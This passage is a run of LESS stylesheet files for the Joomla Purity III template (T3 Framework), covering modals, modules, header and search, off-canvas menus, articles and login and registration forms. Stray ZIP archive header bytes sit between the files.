  padding: 20px 40px 0;
}
// Close icon
.modal-header .close {
}

// Title text within header
.modal-title {
  font-size: @font-size-h2;
}

// Modal body
// Where all modal content resides (sibling of .modal-header and .modal-footer)
.modal-body {
  padding: 10px 40px 20px;

  iframe {
    width: 100%;
    max-height: none;
    border: 0 !important;
  }
}

// Footer (for actions)
.modal-footer {
}

// Scale up the modal
@media screen and (min-width: @screen-sm-min) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    .box-shadow(0 5px 15px rgba(0,0,0,.5));
  }
}



//
// TOOLTIPS (tooltips.less)
// --------------------------------------------------

// Base class
.tooltip {
}

// Wrapper for the tooltip content
.tooltip-inner {
}

// Arrows
.tooltip-arrow {
}
PKԜ�\G"��purity_iii/less/windows.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 

// ------------------------------------------------------
// POPUP WINDOWS STYLES
// ------------------------------------------------------

// Main Body (component.php)
// ----------------------------------------
.window {
  // Reset the body
  body {
    height: auto;
    padding: 0;
    margin: 0;
  }
  
  .window-mainbody {
    padding: 20px;
  }
}


#window-mainbody {
  .container-popup .well {
    &:after {
      display: table;
      content: "";
      clear: both;
    }
  }
}PKԜ�\>��qsspurity_iii/less/modules.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// --------------------------------------------------
// MODULE STYLES
// --------------------------------------------------

// 
// GENECRIC MODULE
// --------------------------------------------------
.t3-module {
  background: @t3-module-bg;
  color: @t3-module-color;
  margin-bottom: @t3-global-margin;

  // Larger margin on Tablet / Desktop
  @media screen and (min-width: @screen-sm) {
    margin-bottom: @line-height-computed * 2;
  }

  // Module padding
  .module-inner {
    padding: @t3-module-padding;
  }
}


// Module Title
// ------------
.module-title {
  background: @t3-module-title-bg;
  color: @t3-module-title-color;
  font-size: @font-size-large;
  font-weight: bold;
  margin: 0 0 (@line-height-computed / 2) 0;
  padding: @t3-module-title-padding;

  // Larger margin on Tablet / Desktop
  @media screen and (min-width: @screen-sm) {
    margin-bottom: @line-height-computed;
  }

}


// Module Content
// --------------
.module-ct {
  background: @t3-module-content-bg;
  color: @t3-module-content-color;
  padding: @t3-module-content-padding;
  .clearfix();
}


// Module List
// -----------
.module-ct,
.module-ct .custom {
  > ul,
  > ol {
    margin-left: 20px;
    padding-left: 0;
  }
  
  > ul.unstyled,
  > ol.unstyled {
    padding-left: 0;
  }

  > ul.nav,
  > ol.nav {
    padding-left: 0;
    margin-left: 0;
  }
}



//
// JOOMLA! MODULES
// --------------------------------------------------

// Menu
// ----
.t3-sidebar {
  .nav {
  }
  
  .nav > li {
    border-top: 1px solid @t3-border-color;
    margin-top: 0;
    &:first-child {
      border-top: 0;
    }
  }
  
  .nav > li > a,
  .nav > li > .separator {
    padding: (@t3-global-padding/2);
    display: block;
  }

  .nav > li.active.open > a {
    background-color: darken(@brand-primary, 5%);
    color: @white;
  }

  // Hover state
  .nav > li > a:hover,
  .nav > li.open > a {
    background-color: @gray-lighter;
    color: @gray-dark;

    .caret {
      border-bottom-color: @gray-dark;
      border-top-color: @gray-dark;
    }
  }

  .dropdown-menu {
    margin-top: 0;
  }
  
  // Active state
  .nav > li.active > a {
    .caret {
      border-top-color: @white;
      border-bottom-color: @white;
    }
  }
  &.t3-sidebar-2,
  &.t3-sidebar-right {
    // Medium desktop view
    @media (max-width: 1450px) {
      .dropdown-submenu.parent.open > .dropdown-menu {
        left: auto;
        right: 100%;
      }
    }
  }
}


// Login Form
// ----------
#login-form {
  
  input[type="text"],
  input[type="password"] {
    width: 100%;
  }

  .input-group-addon {
    align-items: center;
    display: flex;
    width: auto;
  }
  
  .btn-primary {
  }
  
  ul.unstyled {
    margin: 0;
    padding: 0;
    li {
      list-style-type: none;
    }
  }

  #form-login-username {
  }
  
  #form-login-password {
  }
  
  #form-login-remember {
    label {
      font-weight: normal;
    }
  }

  button[class*=plg_system_webauthn_login_button] {
    align-items: center;
    color: #000;
    display: flex;
    max-height: unset;
    gap: 4px;
    width: 100%;
  }
}


// Advertisement
// -------------
.bannergroup {
}

.banneritem {
  a {
    font-weight: bold;
  }
}

.bannerfooter {
  border-top: 1px solid @t3-border-color;
  font-size: @t3-font-size-smaller;
  padding-top: @t3-global-padding / 2;
  text-align: right;
}


// Categories
// ----------
.categories-module, ul.categories-module,
.category-module, ul.category-module {
  margin: 0;
  padding: 0;
  
  li {
    list-style: none;
    padding: (@line-height-computed / 2) 0;
    border-top: 1px dotted @t3-border-color;
    // Remove border for first item
    &:first-child {
      border-top: 0;
      padding-top: 0;
    }
  }
  
  // Title
  h4,
  .mod-articles-category-title {
    font-size: @font-size-base;
    font-weight: normal;
    margin: 0;
    display: block;
  }

  // Metadata
  .mod-articles-category-writtenby,
  .mod-articles-category-date {
    color: @gray;
    font-size: @font-size-small;
  }

  .mod-articles-category-writtenby {
    font-weight: bold;
    margin-right: 10px;
  }

  .mod-articles-category-date {
  }
}


// News Feed
// ----------
.feed {
  // Feed Title
  h4 {
    font-weight: bold;
  }
  // Feed list
  .newsfeed,
  ul.newsfeed {
    border-top: 1px solid @hr-border;
    li {}
    .feed-link, 
    h5.feed-link {
      font-size: @font-size-base;
      font-weight: normal;
      margin: 0;
    }
  }

}


// Latest Users 
// ------------
.latestusers,
ul.latestusers {
  margin-left: 0;
  li {
    background: @gray-lighter;
    display: inline-block;
    padding: 5px 10px;
    border-radius: @border-radius-base;
  }
}


// Who Online
// ----------
.module-ct {
  .whosonline {
    margin-left: 0;
    > li {
      display: inline-block;
      border-radius: @border-radius-base;
      background: @gray-lighter;
      padding: 2px 5px;
      margin: 0 5px 5px 0;
      white-space: nowrap;
    }
  }
}


// Stats 
// -----
.stats-module {
  dt, dd {
    display: inline-block;
    margin: 0;
  }
  dt {
    font-weight: bold;
    width: 35%;
  }
  dd {
    width: 60%;
  }
}


// Popular Tags
//-------------
.tagspopular {
  ul {
    display: block;
    margin: 0;
    padding: 0;
    list-style: none;
    overflow: hidden;
  }

  ul > li {
    background: @gray-lighter;
    border-radius: 3px;
    color: @gray;
    display: block;
    float: left;
    margin: 0 5px 5px 0;
    padding: 3px 10px;

    & > a {
      color: @gray;
    }

    .tag-count {
      background: transparent;
      color: @gray;
      display: inline;
      margin: 0;
      padding: 0;
    }

    // Tag hover
    &:hover {
      background: @brand-primary;
      color: @white;

      a {
        color: @white;
        text-decoration: none;
      }

      .tag-count {
        color: @white;
      }

    }
  }


  // Tag could
  // -----------------------------
  &.tagscloud {
    .tag {
      background: @gray-lighter;
      border-radius: 5px;
      display: inline-block;
      margin-bottom: 5px;
      padding: 5px 10px;

      a {
        color: @gray;

        &:hover, &:focus, &:active {
          color: @link-hover-color;
        }
      }
    }
  }

}


// Similar tags
// ------------
.tagssimilar {
  ul {
    margin: 0;
    padding: 0;
    list-style: none;
  }

  ul > li {
    border-bottom: 1px solid @gray-lighter;
    padding: 8px 0;
  }

  ul > li > a {
    color: @gray;
    // Link states
    &:hover,
    &:focus,
    &:active {
      color: @link-hover-color;
    }
  }
}


// Archived Articles
//------------------
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;

  i {
    color: @gray-light;
    margin-right: 2px;
  }

  li {
    border-bottom: 1px solid @gray-lighter;
    padding: 7px 0;

    a {
      color: @gray;

      // Hover states
      &:hover, &:focus, &:active {
        color: @link-color;
      }
    }
  }
}


// Breadcrums Module
// -----------------
.module-ct > ol.breadcrumb {
  padding: @padding-base-vertical @padding-base-horizontal;
  margin-left: 0;
}

.newsflash {
  img {
    width: 100%;
  }
}PKԜ�\��]�*�*purity_iii/less/style.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

// ---------------------------------------------------------
// MAIN TEMPLATE STYLES
// ---------------------------------------------------------

// 
// HEADER
// ---------------------------------------------------------

// Logo
// ----
.logo {
  position: absolute;
  top: 0;
  left: 0;  
  padding: 0;
  margin: 0;

  a {
    background: transparent;
    color: #fff;
    text-decoration: none;
    display: inline-block;
    line-height: 1;
    margin: 0;
  }

  &:hover a,
  a:hover,
  a:active,
  a:focus {
    background: @navbar-default-border;
    color: @navbar-default-link-hover-color;
    text-decoration: none;
  }

}

// Different Style on Tablets / Desktop
@media screen and (min-width: @grid-float-breakpoint) {
  .logo {
    position: static;
    a {
      background: @navbar-default-border;
    }

    &:hover a,
    a:hover,
    a:active,
    a:focus {
      color: @navbar-default-link-hover-color;
    }
  }
}


// Logo Position when Off-Canvas enable
.off-canvas-toggle + .container .navbar-header .logo {
  left: @navbar-height;
  border-left: 1px solid @navbar-default-border;
  // Remove border on Tablets / Desktop
  @media screen and (min-width: @grid-float-breakpoint) {
    border-left: 0;
  }
}


// Logo Image
// ----------
.logo-image {
  > a {
    max-width: 160px;
    max-height: 55px;

    > img {
      max-width: 100%;
    }
  }

  // Hide sitename and slogan
  span, small {
    display: none;
  }
}


// Logo Text
// ----------
.logo-text {
  text-transform: uppercase;
  font-size: @font-size-large;

  a {
    line-height: @navbar-height;
    padding: 0 @t3-global-padding;
  }

  &:hover a,
  a:hover,
  a:active,
  a:focus {
  }

  // Taglines
  .site-slogan {
    display: none;
  }

}



// Head Search
// -----------
.head-search {
  height: @navbar-height;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;

  form {
    margin: 0;
  }
  
  label {
    display: none;
  }
  
  .search {
    background: @navbar-default-bg;
    border-left: 1px solid @navbar-default-border;
    border-right: 1px solid @navbar-default-border;
    position: relative;
    // Has background on Tablets / Desktop
    @media screen and (min-width: @grid-float-breakpoint) {
      background: @navbar-default-border;
    }
    // Place a search icon
    .fa-search {
      color: @navbar-default-color;
      content: "\f002";
      display: block;
      font-family: "FontAwesome";
      position: absolute;
      left: 20px;
      top: 19px;
      z-index: 1;

      &:hover {
        z-index: 0;
      }
    }
  }
  
  .form-control {
    border: 0;
    background: transparent;
    color: @navbar-default-color;
    height: @navbar-height - 1;
    line-height: @navbar-height - 20;
    position: relative;
    margin: 0;
    padding: 10px 15px 10px 40px;
    width: 0;
    .transition(width .2s);
    // Has background on Tablets / Desktop
    @media screen and (min-width: @grid-float-breakpoint) {
      height: @navbar-height;
    }
    // States
		&:hover, &:active, &:focus {
      color: @navbar-default-link-hover-color;
      box-shadow: none;
    }

    &:active, &:focus {
      width: 180px;
    }

    // Fix Auto Fill Search
		&:-webkit-autofill {
      -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
      -webkit-text-fill-color: @white;
    }
		
		&::-moz-placeholder {
			color: @white;
		}
  }

  // End

  // Compatiblle J4 J5 - Smart  Search
  .mod-finder {

    input {
      z-index: 10;
    }
    
    > .awesomplete {
      position: relative;
      &::after {
        content: '\f002';
        color: #bbe6ff;
        display: inline-block;
        font-family: "FontAwesome";
        height: 16px;
        width: 16px;
        position: absolute;
        top: 19px;
        margin-left: 20px;
      }
    }

    .mod-finder__search {
      input {
        width: 100px;
        padding: 10px 15px;

        @media screen and (max-width: 576px){
          width: 50px;
        }
        
        &:focus {
          width: 200px;
        }
      }
    }
  }
}

// If there is a Navbar Toggle, then replace the Search
.navbar-toggle + .head-search {
  right: @navbar-height;
  max-width: 57px;

  @media screen and (max-width: @grid-float-breakpoint-max) {
		max-width: inherit;
    &:hover, &:focus, &:active {
      max-width: none;

      .form-control { 
        width: 180px;
      }
    }
  }
}

// Absolute position to right on Tablets / Desktop
@media screen and (min-width: @grid-float-breakpoint) {
  .head-search,
  .navbar-toggle + .head-search {
    right: @grid-gutter-width / 2;
    top: 0;
    max-width: none;
  }
}

// NAV
.nav {
  .open > a,
  .open > a:hover,
  .open > a:focus {
  }
}

.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}

.chzn-container  {
  max-width: 100%;
  .chzn-single {
    max-width: 260px;
  }
}

.ie8 {
  .radio.t3onoff {
    border: 0;
  }

  label.on, label.off {
    border: 1px solid @t3-border-color;
  }
}

.pagination > li > a, .pagination > li > span {
  margin-bottom: (@t3-global-margin/2);
}


// MISC 
#eblog-wrapper {
  line-height: 1.625;
}

.com_weblinks {
  .weblink-categories {
    .page-header.item-title .btn {
      padding: 5px;
      
      .fa-minus{
        display: block;
      }

      .fa-plus {
        display: none;
      }
    }
    
    .page-header.item-title .btn.collapsed {
      .fa-minus {
        display: none;
      }

      .fa-plus {
        display: block;
      }
    }
  }
}


// ---------------------------------------------------------
// SPOTLIGHTS
// ---------------------------------------------------------
.t3-spotlight {
  display: -webkit-flex; 
  display: flex; 
  -webkit-flex-flow: row wrap; 
  flex-flow: row wrap;

  > div {
    @media screen and (max-width: @screen-xs-max) {
      margin-bottom: @t3-global-margin;
    }
  }
}

.t3-spotlight:not(:root:root) { 
  @media screen and (min-width: @screen-md-min) {
    .col-md-3 {
      width: 24.9%;
    }

    .col-md-4 {
      width: 33.2%;
    }

    .col-md-6 {
      width: 49.8%;
    }

    .col-md-12 {
      width: 100%;
    }
  }

  @media screen and (max-width: @screen-sm-max) {
    .col-sm-3 {
      width: 24.9%;
    }

    .col-sm-4 {
      width: 33.2%;
    }

    .col-sm-6 {
      width: 49.8%;
    }

    .col-sm-12 {
      width: 100%;
    }
  }
  
  @media screen and (max-width: @screen-xs-max) {
    .col-xs-3 {
      width: 24.9%;
    }

    .col-xs-4 {
      width: 33.2%;
    }

    .col-xs-6 {
      width: 49.8%;
    }

    .col-xs-12 {
      width: 100%;
    }
  }
} 



.t3-sl {
  padding-bottom: @t3-global-padding * 2;
  padding-top: @t3-global-padding * 2;

  @media screen and (max-width: @screen-xs-max) {
    padding-bottom: @t3-global-padding;
    padding-top: @t3-global-padding;
  }

  // Modules
  .t3-module {
    margin-bottom: 0;
    // If there are 2 modules, then add proper margin
    + .t3-module {
      margin-top: @t3-global-margin;
    }
  }

  // Larger padding in Tablet / Desktop
  @media screen and (min-width: @screen-sm) {
    padding-bottom: @t3-global-padding * 3;
    padding-top: @t3-global-padding * 3;
  }
}

// Spotlight 1
// -----------
.t3-sl-1 {
  border-bottom: 1px solid @t3-border-color;
}

// Spotlight 2
// -----------
.t3-sl-2 {
}

// Spotlight 3
// -----------
.t3-sl-3 {
}

// Spotlight 4
// -----------
.t3-sl-4 {
}



// ---------------------------------------------------------
// MAIN BODY
// ---------------------------------------------------------
.t3-mainbody {
  padding-top: @line-height-computed ;
  padding-bottom: @line-height-computed;
}

// Content
// -------
.t3-content {
  padding-top: @line-height-computed ;
  padding-bottom: @line-height-computed;
}

// Sidebars
// --------
.t3-sidebar {
  padding-top: @line-height-computed;
  padding-bottom: @line-height-computed;
}

.t3-sidebar-1 {
}

.t3-sidebar-2 {
}



// ---------------------------------------------------------
// FOOTER
// ---------------------------------------------------------
.t3-footer {
  background: @t3-footer-background;
  color: @t3-footer-text-color;
  .clearfix();

  // small
  small {
    display: block;
    font-size: 100%; //Use global footer font size.
  }

  // links
  a {
    // Link States
    &:hover, &:active, &:focus {
    }
  }

}

// Footer Spotlight
// ----------------
.t3-footer-sl {
  padding: @t3-global-padding 0;
  .clearfix();

  // Larger padding on Tablet / Desktop
  @media screen and (min-width: @screen-sm) {
    padding: (@t3-global-padding * 2) 0;
  }

  // Footer Spotlight Modules
  .t3-module {
    background: @t3-footer-module-background;
    color: @t3-footer-module-text-color;
    margin-top: @line-height-computed / 2;
    margin-bottom: @line-height-computed / 2;

    .module-title {
      color: @t3-footer-module-title-color;
      font-size: @font-size-large;
      margin-bottom: @line-height-computed / 2;
    }

    ul {
      list-style: none;
      margin-left: 0;
      margin-bottom: 0;
      padding-left: 0;

      > li {
        line-height: 24px;
        // links
        > a {
          color: @t3-footer-module-text-color;
          // Link States
          &:hover, &:active, &:focus {
            color: @t3-footer-module-text-color;
          }
        }
      }
    }

  }

}

// Back to Top
// -----------
#back-to-top {
  z-index: 999;
  position: fixed;
  right: @t3-global-margin;
  top: auto;

  &.affix {
    bottom: @t3-global-margin * 2;
  }

  a {
    outline: none;
  }

  i {
    font-size: @font-size-large + 10;
  }
}

// Copyright
// ---------
.t3-copyright {
  border-top: 1px solid @t3-border-color;
  font-size: @font-size-small;
  padding: (@t3-global-padding * 2) 0 (@t3-global-padding * 4);
  .clearfix();
  small {
    margin-bottom: 5px;
  }
}

.copyright {
    margin-bottom: @line-height-computed;
}

.poweredby {
  .clearfix();

  // Align right on Tablet / Desktop
  @media screen and (min-width: @screen-sm-max) {
    text-align: right;
  }

  .t3-logo,
  .t3-logo-small {
    display: inline-block;
  }
}

.mod-preview-info {
  z-index: 2000;
}


// Easyblog
// ------------------
#ezblog-body {
  .blog-text p,
  .blog-text li {
    line-height: 1.625;
  }
}

PKԜ�\'��B

purity_iii/less/off-canvas.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 * @credits       Mary Lou - http://tympanus.net/codrops/2013/08/28/transitions-for-off-canvas-navigations/
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "vars.less"; // Include Variables and Mixins


// EXTEND STYLE IN BASE
// --------------------
@import "../../../plugins/system/t3/base-bs3/less/off-canvas.less";



//
// OFF-CANVAS
// -------------------------------------

// Toggle Button
// -------------------
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: @navbar-default-color;
  padding: 0;
  width: @navbar-height;
  height: @navbar-height;
  line-height: @navbar-height;
  position: absolute;
  top: 0;
  left: 0;
  // States
  &:hover, &:active, &:focus {
    outline: none;
    .box-shadow(none);
    background: @navbar-default-border;
    color: @navbar-default-link-hover-color;
  }
}

// Fix button offcanvas no responsive
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}

//
// OFF-CANVAS CONTENT STYLES
// -------------------------------------
.t3-off-canvas {

  // Generic
  // -----------------------------------
  background: @t3-off-canvas-background;
  color: @t3-off-canvas-text-color;


  // Header
  // -----------------------------------
  .t3-off-canvas-header {
    background: @t3-off-canvas-header-background;
    color: @t3-off-canvas-header-text-color;
    padding: 0 0 0 @padding-base-horizontal;
    height: @navbar-height;

    // Title
    h2 {
      margin: 0;
      line-height: @navbar-height;
      font-size: @font-size-base;
      font-weight: bold;
      text-transform: uppercase;
    }

  }

  // Close Button
  .close {
    margin: 0;
    height: @navbar-height;
    line-height: @navbar-height;
    width: @navbar-height;
    background: transparent;
    position: absolute;
    top: 0;
    right: 0;
  }


  // Body
  // -----------------------------------
  .t3-off-canvas-body {

    padding: (@padding-base-vertical * 4)  @padding-base-horizontal;

    // Links
    // ------------
    a {
      color: @t3-off-canvas-link-color;
      text-decoration: none;

      &:hover,
      &:focus {
        color: @t3-off-canvas-link-hover-color;
        text-decoration: none;
      }

      &:focus {
        .tab-focus();
      }
    }


    // Navigations
    // ------------
    .nav {
    }

    // Dropdown Menu
    .dropdown-menu {
    }


    // Modules
    // ------------
    .t3-module {
      margin-bottom: @line-height-computed;
    }

    .module-title  {
      margin-bottom: @line-height-computed / 2;
    }

  // End Off-Canvas Body
  }

// End Off-Canvas Content Styles
}
PKԜ�\�
$��l�lpurity_iii/less/joomla.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// ---------------------------------------------------------
// GENERIC ARTICLE STYLES
// ---------------------------------------------------------

//
// Articles Layout
// --------------------------------------------------------
.blog {
}

.item-page {
  margin-bottom: @t3-global-margin * 2;
}

// Home Blog
.blog-featured {
}

// Leading Article Rows
.items-leading {
}

.items-leading .leading {
  margin-bottom: @t3-global-margin * 2;
}

// Article Rows
.items-row {
}

.items-row .item {
  margin-bottom: @t3-global-margin * 2;
}

// Divider
.divider-vertical {
  margin: @t3-global-margin 0 (@t3-global-margin * 2);
  border: 0;
  border-top: 1px solid @hr-border;
}


// Article Aside
// -------------------------
.article-aside {
  color: @gray-light;
  font-size: @t3-font-size-smaller;
  margin-bottom: @t3-global-margin;
  padding: 0;
}

.article-header + .article-aside {
  margin-top: -(@t3-global-margin / 2); // If there is an Article Header, minus the gap
}

.article-header {
  display: flex;
  align-items: flex-start;

  .label {
    border-radius: 3px;
    display: inline-block;
    line-height: 1;
    padding: 4px 6px;
  }
}

// Bigger font-size in Article View
.item-page .article-aside {
  font-size: @font-size-base;
  margin-bottom: @t3-global-margin * 2;
}

.article-info {
  margin: 0;
  width: 85%;

  a {
    // Link states
    &:hover, &:focus, &:active {
    }
  }
  
  .article-info-term {
    display: none;
  }
  
  dd {
    display: inline-block;
    margin-left: 0;
    margin-right: 10px;
    margin-bottom: 5px;
    white-space: nowrap;
    strong {
      font-weight: 600;
    }
    .fa {
      margin-right: 5px;
    }
  }

}

// Author
.createdby {
}

// Category Name
.category-name {
  text-transform: capitalize;
  .fa {
    display: none;
  }
  a {
    background: @brand-primary;
    color: #fff;
    padding: 2px 5px;
    // Link states
    &:hover, &:focus, &:active {
      background: darken(@brand-primary,15%);
      color: #fff;
      text-decoration: none;
    }
  }
}

// URL
.article-url {
}

// Publish Date
.published {
}

// Modified Date
.modifydate {
}

// Article Desciption
.contentdescription {
}

.contentdescription p {
}


// Article Footer
// -------------------------
.article-footer {
  color: @gray-light;
  font-size: @font-size-small;
  margin-bottom: @t3-global-margin;
}


// Article Images
// -------------------------

article,
.article-intro {

  // Make the image reponsive.
  // Remove if you don't want article images to be responsived.
  img {
    .img-responsive();
  }

  // Add proper margin
  img[align="left"],
  .img-fulltext-left,
  .img-intro-left,
  .img_caption.left,
  .pull-left.item-image {
    margin-right: @t3-global-margin;
    max-width: 100%;

    @media screen and (max-width: @screen-xs-max) {
      margin: 0 0 @t3-global-margin;
    }
  }

  img[align="right"],
  .img-fulltext-right,
  .img_caption.right,
  .img-intro-right,
  .pull-right.item-image {
    margin-left: @t3-global-margin;
    max-width: 100%;

    @media screen and (max-width: @screen-xs-max) {
      margin: 0 0 @t3-global-margin;
    }
  }

  .pull-none.item-image {
    img {
      width: 100%;
    }
  }

}

.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: @t3-global-margin;
  max-width: 100%;
}

.img-fulltext-left {
  float: left;
}

.img-fulltext-right {
  float: right;
}

// Image caption
.img_caption {
  > img {
    margin-bottom: 1px !important;
  }
  p.img_caption {
    background: @gray-lighter;
    color: @gray;
    font-size: @font-size-small;
    width: 100%;
    margin: 0;
    padding: 5px;
    text-align: center;
    clear: both;
  }
}

// Images on List and Blog layout
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
  img {
    margin-left: 0 !important;
    margin-right: @t3-global-margin;
  }
}

// Reponsive Article Images on Mobile
@media screen and (max-width: @screen-md) {
  article,
  .article-intro {
    img, img[align=left], img[align=right],
    .img_caption,
    .article-image-full,
    .article-image-intro,
    .img-intro-none,
    .img-intro-left,
    .img-intro-right,
    .img-fulltext-none,
    .img-fulltext-left,
    .img-fulltext-right {
      float: none !important;
      margin-left: 0;
      margin-right: 0;
      width: 100% !important;
    }
  }
}


// Article Tags
// -------------------------
.item-page .tags {
  border-top: 1px solid @gray-lighter;
  padding: (@t3-global-padding / 2) 0;

  span {
    display: inline-block;
    margin-bottom: 10px;
  }

  a {
    background: @white;
    border: 1px solid @gray-lighter;
    border-radius: 3px;
    color: @gray;
    padding: 5px;

    // Hover states
    &:hover, &:focus, &:active {
      background: @gray-light;
      border-color: @gray-light;
      color: @link-hover-color;
    }
  }
}


// Article Archive
// -------------------------
.archive {
  .filters {
    margin: 0 0 @t3-global-margin;
  }
}

#archive-items {
  article {
    border-bottom: 1px solid @t3-border-color;
    margin-bottom: @t3-global-margin;
    padding-bottom: @t3-global-padding;

    h2.article-title {
      font-size: @font-size-h3;
      line-height: 1.3;
    }
  }
}


// Article Actions
// -------------------------
article aside .btn-group {
  .dropdown-menu {
  }
  
  > .dropdown-toggle,
  > .dropdown-toggle:hover,
  > .dropdown-toggle:active,
  > .dropdown-toggle:focus {
    padding: 2px 5px;
  }

  > .dropdown-toggle .caret {
    margin-left: 2px;
  }

}



//
// TAGS CATEGORY
// ---------------------------------------------------------
.tag-category {
  
  // Filter bar
  .filters {
    border-bottom: 1px solid @gray-lighter;
    padding: @t3-global-padding 0;

    #filter-search {
      float: left;
    }

    &.btn-toolbar > .btn-group {
      margin-left: 0;
    }
  }

  .thumbnails {
    list-style: none;
    margin: 0;
    padding: 0;

    li {
      background: transparent;
      border-bottom: 1px solid @gray-lighter;
      padding: (@t3-global-padding / 2) 0;
    }

    li > h3 {
      margin-top: 0;
    }

  }

  .com-tags-filter-field-wrap {
    display: flex;
    flex-wrap: wrap;
    justify-content: space-between;
    margin-bottom: 2rem;

    .btn-group {
      display: flex;
      margin-right: 0;
    }
  }
}

// Read more
.readmore {
  margin-top: @t3-global-margin;
}


// ---------------------------------------------------------
// ROW LISTS
// ---------------------------------------------------------
// List types using in Joomla! Core

// Alternating Rows
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid @table-border-color;
}

.row-odd {
  background-color: @table-bg;
}

.row-even {
  background-color: @table-bg-accent;
}

.blog-row-rule,
.blog-item-rule {
  border: 0;
}

// Row reveal
.row-fluid .row-reveal {
  visibility: hidden;
}

.row-fluid:hover .row-reveal {
  visibility: visible;
}

// Nav List Offset
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}


// Striped
// -------
.list-striped,
.row-striped {
  list-style: none;
  line-height: @line-height-computed;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid @table-border-color;
  margin-left: 0;
  padding-left: 0;
}

.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid @table-border-color;
  padding: 10px 15px;
}

.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: @table-bg-accent;
}

.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: @table-bg-hover;
}

.row-striped .row-fluid {
  width: 97%; // lower than 100% since we have padding
}

.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}

.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}

.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}


// Condensed
// ---------
.list-condensed {
  li {
    padding: 5px 10px;
  }
}

.row-condensed {
  .row, .row-fluid {
    padding: 5px 10px;
  }
}


// Bordered
// --------
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid @table-border-color;
}



// ---------------------------------------------------------
// COMMON JOOMLA STYLES
// ---------------------------------------------------------

//
// LOGIN
// ---------------------------------------------------------
.login-wrap{

  // Header
  .page-headder {
  }

  // Description
  .login-description {

  }

  // Login Form
  form {

    fieldset {
    }

    label {
    }

    .form-group {
    }

  }

  // Links
  .other-links {
    ul {
      padding-left: @grid-gutter-width / 2;
    }
  }

}

#jform_privacyconsent_privacy-lbl,
#jform_consentbox-lbl ,
#jform_terms_terms-lbl,
#jform_profile_tos-lbl {
  a.modal {
    display: inline-block;
    position: relative;
  }
}

#jform_terms_terms,
#jform_privacyconsent_privacy,
#jform_consentbox,
#jform_profile_tos {
  input[type="radio"],
  input[type="checkbox"] {
    position: relative;
    margin: 0;
    margin-right: 5px;
    width: auto;
  }

  label {
    margin-right: @t3-global-margin / 2;
    padding: 0;
  }
}

//
// REGISTER
// ---------------------------------------------------------
.form-register {

  fieldset {
    padding: 0 0 10px;
  }

  p {
    margin: 0 0 5px;
  }

  p.form-des {
    margin: 15px 0;
  }

  label {
    display: block;
    float: left;
    font-weight: bold;
    text-align: right;
    width: 130px;
  }

  .input,
  .inputbox {
    margin-left: 10px;
    width: 200px;
  }

  .btn,
  .button {
    margin-left: 140px;
  }

}

